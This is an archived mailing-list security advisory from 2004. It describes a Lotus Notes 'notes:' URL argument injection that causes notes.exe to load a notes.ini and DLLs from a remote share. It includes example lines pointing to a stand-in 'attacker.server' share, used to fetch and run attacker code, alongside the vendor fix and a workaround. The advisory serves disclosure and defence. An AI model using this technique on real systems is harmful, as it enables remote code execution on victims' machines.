lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040627150038.GA14514@jouko.iki.fi>
From: jouko at iki.fi (Jouko Pynnonen)
Subject: Lotus Notes URL argument injection vulnerability


OVERVIEW
========

Lotus Notes is a groupware/e-mail system developed by Lotus Software. 
Due to its security and collaboration features it's used particularly 
by large organizations, government agencies, etc. IBM estimates it is 
used by 60 million people.

During the client-side Windows installation of Lotus Notes, a "notes:" 
URL handler is registered in the registry. An argument injection 
attack allows an intruder to pass command line arguments to notes.exe, 
which can lead to execution of arbitrary code.



DETAILS
=======

The installed registry entry causes any "notes:" URL to be opened with 
notes.exe and the URL passed as the argument. If the URL contains space 
characters, notes.exe takes the characters after that as a second 
command line argument. Any web page can cause notes.exe be started in 
this way by refering to a notes: URL.

Location of Notes configuration file, notes.ini, can be specified on 
the command line by prefixing it with an equals sign (=). The notes.ini 
file can be located on a network share. An attacker can use the URL to 
specify an arbitrary notes.ini file located on a public network share, 
so that the command run when opening the URL would be e.g.

  notes.exe =\\attacker.server\notes\notes.ini

The notes.ini file contains locations for Notes data directory, which 
in this case can be also located on a public network share. The 
notes.ini file could contain e.g.

  [Notes]
  Directory=\\attacker.server\\notes

The program uses this directory to load some dynamic libraries. 
The attacker can place arbitrary code in the init section of such DLL 
and cause it to be run during notes.exe startup. The scenario was 
successfully tested with an exploit. On opening the malicious web 
page, the victim system downloaded the DLL and ran the code in it.

The exploit requires that notes.exe isn't already running while the 
victim views the malicious web page or e-mail message, because DLL's 
are only loaded on program startup. It also requires that outgoing 
connections to Internet shares aren't blocked by firewalls or registry 
settings.



SOLUTION
========

IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now 
been released to solve the issue. As a workaround, the registry key

   HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

can be removed.



CREDITS
=======

The vulnerability was discovered and researched by Jouko Pynn?nen, 
Finland.





-- 
Jouko Pynn?nen          Web: http://iki.fi/jouko/
jouko@....fi            GSM: +358 41 5504555


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ